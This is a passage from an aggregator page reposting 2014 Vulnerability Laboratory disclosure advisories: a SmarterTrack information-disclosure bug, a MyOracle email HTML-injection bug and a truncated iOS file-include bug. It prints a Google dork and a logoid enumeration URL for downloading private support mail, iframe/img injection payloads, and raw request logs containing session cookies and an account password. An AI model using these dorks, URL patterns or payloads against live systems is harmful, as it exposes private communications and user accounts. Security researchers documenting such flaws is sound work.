more here...........http://www.ifc0nfig.com/national-express-ticket-disclosure/

---

SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability

September 26, 2014, 4:23 am

≫ Next: Oracle Corporation MyOracle - Persistent Vulnerability

≪ Previous: National Express print-at-home vulnerability

$

0

0

Document Title:
===============
SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1298

Tracking ID: 088-1B879F0C-0A22


Release Date:
=============
2014-09-22


Vulnerability Laboratory ID (VL-ID):
====================================
1298


Common Vulnerability Scoring System:
====================================
6.1


Product & Service Introduction:
===============================
SmarterTrack is a powerful communications platform that acts as an online help desk for initiating, tracking, managing and reporting
on a number of different communication channels. Whether it is a ticket submission via email or from the online portal, a live chat,
a community post, comments made on a knowledge base article or more, SmarterTrack provides a centralized outlet for all communication
channels and is an ideal solution for building your online community.

( Copy of the Vendor Homepage: http://www.smartertools.com/smartertrack/help-desk-software.aspx )


Abstract Advisory Information:
==============================
An independent Vulnerability Laboratory Researcher discovered an Information Disclosure issue in the official SmarterTools Smarter Track v6,v7,v8,v9 & v10.


Vulnerability Disclosure Timeline:
==================================
2014-08-23:     Researcher Notification & Coordination (Ehsan Vahab )
2014-08-23:     Vendor Notification (Smartertools Security Team)
2014-08-25:     Vendor Response/Feedback (Smartertools Security Team)
2014-09-21:     Vendor Fix/Patch Notification (Smartertools - Developer Team)
2014-09-22:     Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An Information Disclosure vulnerability has been discovered in the smarter track v(6,7,8,9,10) web-application.
The information disclosure issue allows a remote attacker to gain unauthorized access to available mail conversations.

The vulnerability allows remote attackers to get all of the mail messages that gets transfered between the customer and application owner.
The vulnerability is located in the AvatarHandler.ashx file with vulnerable query string parameter `logoid`.
remote attackers are able to change in the GET method request the logoid and can download the .zip files that contains the .eml
(outlook extension) file. The .eml file impact admin or user messages. If the logoid was wrong the zip file capacity is 0 byte
and download is not possible.

Exploitation of the vulnerability requires no privileged web application user account and also no user interaction.
Successful exploitation of the issue results in unauthorized access to private server communication via email support.

Request method(s):
                                [+] GET

Vulnerable File(s):
                                [+] AvatarHandler.ashx

Vulnerabel ´Parameter(s):
                                [+] logoid


Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged application user account and also without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Google Dork :
inurl:/kb/root.aspx

PoC :
smartertrack.localhost.com/AvatarHandler.ashx?logoid=[vulnerable number]

Wrong logoid:
http://support.xxx.com/AvatarHandler.ashx?logoid=182206

Correct logoid:
http://support.xxx.com/AvatarHandler.ashx?logoid=208758
http://support.xxx.com/AvatarHandler.ashx?logoid=208765
http://support.xxx.com/AvatarHandler.ashx?logoid=208766


Solution - Fix & Patch:
=======================
2014-09-21:     Vendor Fix/Patch Notification (Smartertools - Developer Team)


Security Risk:
==============
The security risk of the information dsiclosure issue is estimated as medium(+).


Credits & Authors:
==================
Ehsan Vahab (https://www.linkedin.com/profile/view?id=305567696)


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com                        - admin@evolution-sec.com
Section:    dev.vulnerability-db.com            - forum.vulnerability-db.com                            - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

Oracle Corporation MyOracle - Persistent Vulnerability

September 26, 2014, 4:23 am

≫ Next: GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability

≪ Previous: SmarterTools Smarter Track 6-10 - Information Disclosure Vulnerability

$

0

0

Document Title:
===============
Oracle Corporation MyOracle - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1261

Oracle Security ID (Team Tracking ID): admin@vulnerability-lab.com-001


Release Date:
=============
2014-09-17


Vulnerability Laboratory ID (VL-ID):
====================================
1261


Common Vulnerability Scoring System:
====================================
3.9


Product & Service Introduction:
===============================
Oracle Corporation is an American multinational computer technology corporation headquartered in Redwood City, California, United States.
The company specializes in developing and marketing computer hardware systems and enterprise software products – particularly its own brands
of database management systems. Oracle is the second-largest software maker by revenue, after Microsoft. The company also builds tools for
database development and systems of middle-tier software, enterprise resource planning (ERP) software, customer relationship management (CRM)
software and supply chain management (SCM) software. Larry Ellison, a co-founder of Oracle, has served as Oracle`s CEO throughout its history.
He also served as the Chairman of the Board until his replacement by Jeffrey O. Henley in 2004. On August 22, 2008, the Associated Press
ranked Ellison as the top-paid chief executive in the world.

(Copy of the Homepage: http://en.wikipedia.org/wiki/Oracle_Corporation )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent vulnerability in the official Oracle Corporation `MyOracle` service web-application.


Vulnerability Disclosure Timeline:
==================================
2014-04-28: Researcher Notification & Coordination (Benjamin Kunz Mejri)
2014-04-30: Vendor Notification (Oracle Sec Alert Security Team)
2014-05-03: Vendor Response/Feedback (Oracle Sec Alert Security Team)
2014-09-01: Vendor Fix/Patch (Oracle Developer Team - Acknowledgments 2014 October CPU Advisory)
2014-09-17: Public Disclosure (Vulnerability Laboratory)



Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A filter and persistent input validation mail encoding web vulnerability has been discovered in the official Oracle Corporation `MyOracle` service web-application.
The vulnerability allows to bypass the regular web/system validation to inject own script codes in outgoing emails of the account system mail server service.

The vulnerability is located in the name values of the my-oracle `registration` module. Remote attackers are able to inject in the first and lastname input fields of the
registration formular own script codes via POST method request. The injected script code activates the account mail service notification which returns with the persistent
code in the myoracle token activation site. The issue impact a critical risk because an attacker is able to inject own tokens or can manipulate the full mail body context.
Further send notification mails by the myoracle service can also be affected by the issue. The encoding of the server does not recognize outgoing service mails which
results in the persistent issue in outgoing emails. The injection point is a profile values update or directly the remote registration itself. The security risk of the
persistent mail encoding and filter web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.9.

Exploitation of the vulnerability requires low user interaction and no privileged application user account. Successful exploitation results in persistent session hijacking
attacks, unauthorized external redirects to malicious sources and persistent manipulation of affected or connected module context.

Request Method(s):
                                [+] POST

Vulnerable Service(s):
                                [+] MyOracle

Vulnerable Module(s):
                                [+] Registration (exp.)

Vulnerable Parameter(s):
                                [+] Profile name values (firstname & lastname ...)


[Sender]:
                                [+] oracle-acct_ww@oracle.com

[Receiver]:
                                [+] admin@evolution-sec.com & bkm@evolution-sec.com


Proof of Concept (PoC):
=======================
The persistent mail encoding web vulnerability can be exploited by remote attackers with low user interaction and without privileged application user account.
For security demonstration or to reproduce the persistent mail encoding web vulnerability follow the provided information and steps below to continue.

Sender Mailbox - Main Oracle Server
oracle-acct_ww@oracle.com

Affected Mailbox - Receiver/Victim
admin@evolution-sec.com
bkm@evolution-sec.com


Inject via Profile (POST)
https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx?nextURL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3


Inject via Registration (POST)
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0


After Inject (REDIRECT OPTIONS)
https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2~656BF073~675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0


-- PoC Session Logs [POST] ---

20:16:31.280[4105ms][total 4105ms] Status: 302[Moved Temporarily]
POST https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0 Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[720] Mime Type[text/html]
   Request Header:
      Host[myprofile.oracle.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
      Cookie[optimizelySegments=%7B%22174383146%22%3A%22ff%22%2C%22174203172%22%3A%22false%22%2C%22173164270%22%3A%22direct%22%7D; optimizelyEndUserId=oeu1398447211204r0.7026125166698021; optimizelyBuckets=%7B%7D; s_cc=true; s_fid=343B504EB719CF63-1174BEDEC7EE3C0B; s_nr=1398449779754; gpw_e24=https%3A%2F%2Fmyprofile.oracle.com%2FEndUser%2Ffaces%2Fprofile%2FcreateUser.jspx%3FnextURL%3Dhttps%253A%252F%252Flogin.oracle.com%252Fpls%252Forasso%252Forasso.wwsso_app_admin.ls_login%253FSite2pstoreToken%253Dv1.2%257E656BF073%257E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0; s_sq=oracleglobal%3D%2526pid%253Dprofile%25253Aen-us%25253Acreate-user%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BTrPage._autoSubmit('f1'%25252C'usr_srv_otn'%25252Cevent%25252C1)%25253Breturntrue%25253B%25257D%2526oidt%253D2%2526ot%253DCHECKBOX; p_org_id=1001; p_lang=US; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=3; atgPlatoStop=1; BreadCrumb=%257BlevelName%253A%253A%253Cspan%2520style%253D%2522color%253ARED%253B%2520font-weight%253Abold%253B%2520font-size%253A11px%253B%2522%253EOracle%253C/span%253E%2520University%2520Home%2523%2523levelUrl%253A%253A/pls/web_prod-plq-dad/db_pages.getpage%253Fpage_id%253D3%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D%257C%257C%257C%257BlevelName%253A%253A%2523%2523levelUrl%253A%253A%257D; JSESSIONID=GBTGThlDQtGWmKXcVyTT5SF2LNBpRNGJ65Ls1KTZSjRf5rXvxm8L!1006513418!189473844; BIGipServermktap_myprofile_cache_pool=1729139341.26910.0000; notice_preferences=2:cb8350a2759273dccf1e483791e6f8fd; s_eVar21=CLD-hp-panel-build-business-intelligence]
      Connection[keep-alive]
   POST-Daten:
      ops[Bitte+w%C3%A4hlen+Sie+...]
      drm[Sie+m%C3%BCssen+%7B0%7D+eingeben.]
      drsm[Sie+m%C3%BCssen+f%C3%BCr+%7B0%7D+mindestens+ein+Element+ausw%C3%A4hlen]
      err[FEHLER]
      reqd[Erforderliches+Feld.]
      lqws[https%3A%2F%2Floqate.oracle.com%2FLoqate%2FLoqate]
      unamefield[admin%40evolution-sec.com]
      passwd1[Keymaster148%21]
      passwd2[Keymaster148%21]
      givenname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      middlename[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      sn[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_jtitle[pentester]
      usr_ctry[41]
      usr_state[6]
      usr_cty[Kassel]
      companyname[%22%3E%3Ciframe+src%3Da%3E%2520%22%3E%3Cimg+src%3D%22x%22%3E]
      usr_line1[bremerstrasse+1337]
      usr_line2[]
      usr_postal_code[34125]
      telephonenumber[573246234]
      usr_srv_otn[t]
      usr_srv_cio[t]
      usr_nsl_psn[t]
      org.apache.myfaces.trinidad.faces.FORM[f1]
      _noJavaScript[false]
      javax.faces.ViewState[%2118erzf7qoc]
      event[]
      source[cb1]
      partial[]
   Response Header:
      Location[https://myprofile.oracle.com/EndUser/faces/profile/notifyPage.jspx?nextURL=https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken%3Dv1.2%7E656BF073%7E675513E7AD76FD8C4E372E51B2B1C865CAACC2C852B20F2BD867F0E17ADBC588490397EDBB4E806B8B9F6A62F007FB1F52B3139D0E0CCD3F0A7BCD845E91E70040DBAB012C47944EA97FDCA8B74BEF3D7714766E9E5568B341AEB34C071F851E16A4D5084FC09C83C3279F07D3FA679FA89FB489567D87A3D1816E50A9F642471F0FB868EC2825951B90FB7BBC8C29809D351D864E4A25403DFAEAA2C39165F7BE2B6DC7EA41789548D178C499DFFC1FD1536A238758569DAEA47C1DF6628ACDBCB4D39934B63FC177D19079F50E1C841EEC5CB051003C12025C41A5173A8B3BD3356D63B2687400A3CA4DF03094F6B22C6797B965AB5846B8636FCCE5D37C44193908907C9BBCBC9FEFA44ECCC4AE86DCE23B70E4FF8212CD5FECD8F458B6486F03E3CC39ED39C3E3C32E4E9674F7A0]
      X-Frame-Options[sameorigin]
      Content-Type[text/html]
      Content-Language[en]
      Content-Encoding[gzip]
      Server[Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (N;ecid=122956956898568077,0)]
      Content-Length[720]
      Vary[Accept-Encoding]
      Date[Fri, 25 Apr 2014 18:16:45 GMT]
      Connection[keep-alive]






PoC: Exploitcode in Mail

<html><head>
<title>Bitte verifizieren Sie Ihren Oracle Account</title>
<link rel="important stylesheet" href="chrome://messagebody/skin/messageBody.css">
</head>
<body>
<table class="header-part1" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>Betreff: </b>Bitte verifizieren Sie Ihren Oracle Account</td></tr><tr><td><b>Von: </b>oracle-acct_ww@oracle.com</td></tr><tr><td><b>Datum: </b>25.04.2014 20:16</td></tr></tbody></table><table class="header-part2" cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td><b>An: </b>admin@evolution-sec.com</td></tr></tbody></table><br>
<meta http-equiv="Content-Type" content="text/html; "><table cellpadding="0" cellspacing="0" align="center" border="0" width="640"><tbody><tr><td style="border-top:#CCCCCC solid 1px; border-right:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px; border-left:#CCCCCC solid 1px; background-color:#FFFFFF;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tbody><tr><td style="background-color:#FF0000;"><a href="http://www.oracle.com" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/302715.gif" alt="Oracle Corporation" border="0" height="30" hspace="12" width="123"></a></td></tr><tr><td style="padding:15 15 15 15; font-family:Arial, Helvetica, sans-serif; font-size:12px; color:#333333;">Sehr geehrte(r) "><iframe src="http://www.vulnerability-lab.com">%20"><img src="x">,<br><br>Bitte klicken Sie zum Bestätigen Ihres Accounts auf den folgenden Link. Der Link ist 5 Tage lang gültig.<br><br><a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE"><font color="#FF0000">Link zur Accountverifizierung</font></a><br><br>Ihr Oracle Benutzername: admin@evolution-sec.com<br><br><b>Warum Email Verifizierung?</b><br><li>Schutz Ihrer Daten</li><li>Zugriff auf Oracle Anwendungen und Websites, die eine Verifizierung erfordern</li><br><br><b>Der Link zur Accountverifizierung funktioniert nicht?</b><br>Sollte der obige Link nicht funktionieren können Sie zur Verifizierung Ihrer Emailadresse auch die folgende URL kopieren und in Ihren Browser einfügen:<br><br>[https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx?key=E28D4AFE3C2186C40C5E110F90FED0ADAE4262F73D46C4E7987F609FD0257E4AA51B6E896C85084916A06DF9F740618EAEE6EC45B3A302FAD49E2516B405A9FE]<br><br><b>Sie wollen eine weitere Bestätigungsemail generieren?</b><br>1) <a href="https://myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx" target="_blank"><font color="#FF0000">Melden Sie sich bei Ihrem Account an.</font></a><br>2) Klicken Sie auf den Link "Account verifizieren" oder "Account erneut verifizieren". <br><br>Vielen Dank.<br>Das Oracle Account Team</font><br><br><hr style="color:#CCCCCC; height:1px;" /><strong>Richtlinien:</strong><br><font size="1">Bitte bedenken Sie, dass Ihre Nutzung der Oracle Websites und Services der <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000">Oracle Datenschutzrichtlinie</font></a> und den <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000">Servicebedingungen</font></a> unterliegt.<br><br>Verwaltung Ihres Benutzerkontos: Bitte aktualisieren Sie Ihre Emailadresse bei etwaigen Änderungen, damit wir Ihnen im Falle von Problemen mit dem Kontozugriff behilflich sein können. Melden Sie sich dafür zunächst an und klicken Sie dann auf den Link "Benutzernamen ändern" auf Ihrer Oracle Account-Seite.<br><br>Aktualisieren der Kommunikationseinstellungen für Ihre Emailadresse: Bitte melden Sie sich bei Ihrem Account an, um die Einstellungen der Kommunikationseinstellungen für Ihre Emailadresse zu aktualisieren.<br><br>Sie haben diese Email erhalten, da vor kurzem für diese Emailadresse ein Benutzerkonto auf der Oracle Website erstellt wurde. Wenn Sie in letzter Zeit kein Benutzerkonto auf der Oracle Website erstellt haben, <a href="http://apex.oracle.com/pls/otn/f?p=42988:3" target="_blank"><font color="#FF0000">senden</font></a> Sie uns eine Hilfsanfrage.<br><br>Bei Zugriffs- oder Anmeldeproblemen <a href="http://apex.oracle.com/pls/otn/f?p=42988:3:2527260596859682::NO:::" target="_blank"><font color="#FF0000">klicken Sie bitte hier</a>.</font><br></tr><tr><td style="padding:15 15 15 15; border-top:#CCCCCC solid 1px; border-bottom:#CCCCCC solid 1px;"><a href="http://www.oracle.com/us/corporate/index.html" target="_blank"><img src="http://www.oracleimg.com/ocom/groups/public/@ocom/documents/digitalasset/196263.gif" alt="Hardware and Software Engineered to Work Together" width="174" height="50" border="0" /></a></td></tr><tr><td><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td height="25" style="padding:0 0 0 15;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333">Copyright 2014, Oracle. Alle Rechte vorbehalten.</font></td><td align="right" style="padding:0 15 0 0;"><font face="Arial, Helvetica, sans-serif" size="1" color="#333333"> <a href="http://www.oracle.com/de/corporate/contact/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Kontakt</u></font></a> | <a href="http://www.oracle.com/us/legal/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Rechtliche Hinweise und Nutzungsbedingungen</u></font></a> | <a href="http://www.oracle.com/us/legal/privacy/index.html" target="_blank"><font color="#FF0000" size="1" face="Arial, Helvetica, sans-serif"><u>Datenschutz</u></font></a></font></td></tr></table></td></tr></table></td></tr></table></body></html>
</body>
</html>
</iframe></td></tr></tbody></table></td></tr></tbody></table></body></html>


Script Code Payload:
><iframe src="http://www.vulnerability-lab.com">%20"><img src="http://evolution-sec.com/sites/default/files/65-2_0.png">



Reference(s):
https://myprofile.oracle.com/
https://myprofile.oracle.com/EndUser/faces/profile/sso/verifyAccount.jspx
https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx?nextURL=x
https%3A%2F%2Flogin.oracle.com%2Fpls%2Forasso%2Forasso.wwsso_app_admin.ls_login%3FSite2pstoreToken


Picture(s):
                                ../1.png
                                ../2.png
                                ../3.png


Resource(s):
                                ../Account verifizieren.htm
                                ../Bitte verifizieren Sie Ihren Oracle Account.html
                                ../Bitte verifizieren Sie Ihren Oracle Account_poc.html
                                ../poc.txt


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure parse and encode of the vulnerable first- and last-name input fields in the myoracle application.
Encode stored data of user in the dbms when processing to send service notifications by the mail info@oracle email to prevent persistent injection attacks.


Security Risk:
==============
The security risk of the persistent mail encoding web vulnerability in the myoracle account system web-server is estimated as medium.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com         - research@vulnerability-lab.com               - admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]

GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability

September 26, 2014, 4:24 am

≫ Next: Paypal Inc Bug Bounty #16 - Persistent Mail Encoding Vulnerability

≪ Previous: Oracle Corporation MyOracle - Persistent Vulnerability

$

0

0

Document Title:
===============
GS Foto Uebertraeger v3.0 iOS - File Include Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1325


Release Date:
=============
2014-09-22


Vulnerability Laboratory ID (VL-ID):
====================================
1325


Common Vulnerability Scoring System:
====================================
6.3


Product & Service Introduction:
===============================
The best Photo Transfer app on the App Store!Photo Transfer allows you to quickly transfer photos between your iPhone,
iPad, PC or Mac using your local Wi-Fi network, without any 3rd party transfer utilities. It can easily access your photo
libraries via wifi from any computer with a web browser(IE/Chrome/Safari) on the same wifi network, very easy to use!

(Copy of the Homepage: https://itunes.apple.com/en/app/wifi-fotos-ubertrager-+-uber/id902267412 )



Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a file include vulnerability in the official Golden Soft Photo/Foto Uebertraeger v3.0 iOS mobile application.


Vulnerability Disclosure Timeline:
==================================
2014-09-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Golden Soft
Product: Foto Überträger - iOS Mobile Web Application 3.0


Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Briefcase Pro v4.0 iOS mobile wifi web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
specific path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename and albumname` values of the `uploadPhotoPost` module. Remote attackers are able to inject
own files with malicious `filename or albumname` values in the `uploadPhotoPost` POST method request to compromise the mobile web-application.
The local file/path include execution occcurs in the index dir listing of the wifi interface context. The attacker is able to inject the local
file include request by usage of the `wifi interface` in connection with the vulnerable upload request.

Remote attackers are also able to exploit the filename/albumname validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3.
